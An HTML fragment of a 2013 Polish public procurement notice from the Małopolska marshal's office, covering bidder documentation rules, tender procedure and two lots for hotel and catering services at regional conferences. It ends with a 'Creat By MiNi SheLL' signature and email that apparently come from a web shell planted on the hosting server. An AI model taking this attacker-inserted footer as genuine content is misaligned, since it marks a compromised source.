<p>1. W przypadku, gdy Wykonawcę reprezentuje Pełnomocnik wraz z ofertą winno być złożone pełnomocnictwo dla tej osoby określające jego zakres. Pełnomocnictwo winno być podpisane przez osoby uprawnione do reprezentowania Wykonawcy.
2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.
3. Jeżeli Wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności poprzez przedstawienie pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji tych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
4. Dokumenty potwierdzające, że wykonawca będzie dysponował zasobami innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy, w stopniu niezbędnym dla należytego wykonania zamówienia oraz umożliwiającym ocenę, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, winny  w szczególności zawierać informacje dotyczące: 
a) zakresu dostępnych wykonawcy zasobów innego podmiotu,
b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrotamalopolski.pl/BIP/um<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Małopolskiego, ul. Racławicka 56, 30-017 Kraków, pok. 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2013 godzina 14:00, miejsce: Urząd Marszałkowski Województwa Małopolskiego, Dziennik podawczy (budynek B), 30-017 Kraków, ul. Racławicka 56.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> usługi hotelarskie i restauracyjne na potrzeby realizacji 2 dniowej Konferencji dla przedstawicieli Małopolskiej Policji w ramach programu pn. Zagrożenia w Sieci - profilaktyka, reagowanie w dniach 21 i 22 października 2013 roku w hotelu w granicach administracyjnych gminy Bukowina Tatrzańska, gminy Białka Tatrzańska lub gminy Krynica Zdrój.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. usługi hotelarskie i restauracyjne na potrzeby realizacji 2 dniowej Konferencji dla przedstawicieli Małopolskiej Policji w ramach programu pn. Zagrożenia w Sieci - profilaktyka, reagowanie w dniach 21 i 22 października 2013 roku w hotelu w granicach administracyjnych gminy Bukowina Tatrzańska, gminy Białka Tatrzańska lub gminy Krynica Zdrój.
2. Wielkość zamówienia: 34959,35 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.12.00.00-7, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> usługi hotelarskie i restauracyjne na potrzeby realizacji 3 - dniowej ewaluacyjnej Szkoleniowej Konferencji Profilaktycznej Przeciwdziałanie niepożądanym zachowaniom w szkole dla dyrekcji, nauczycieli, wychowawców, pedagogów oraz psychologów szkół z terenu Województwa Małopolskiego uczestniczących już w pierwszym etapie szkolenia, w dniach 25, 26 i 27 listopada 2013 roku w hotelu w granicach admi. gminy Bukowina Tatrzańska lub gminy Białka Tatrzańska lub gminy Krynica-Zdrój.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. usługi hotelarskie i restauracyjne na potrzeby realizacji 3 - dniowej ewaluacyjnej Szkoleniowej Konferencji Profilaktycznej Przeciwdziałanie niepożądanym zachowaniom w szkole dla dyrekcji, nauczycieli, wychowawców, pedagogów oraz psychologów szkół z terenu Województwa Małopolskiego uczestniczących już w pierwszym etapie szkolenia, w dniach 25, 26 i 27 listopada 2013 roku w hotelu w granicach administracyjnych gminy Bukowina Tatrzańska lub gminy Białka Tatrzańska lub gminy Krynica-Zdrój.
2. Wielkość zamówienia: 22487,08 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.12.00.00-7, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com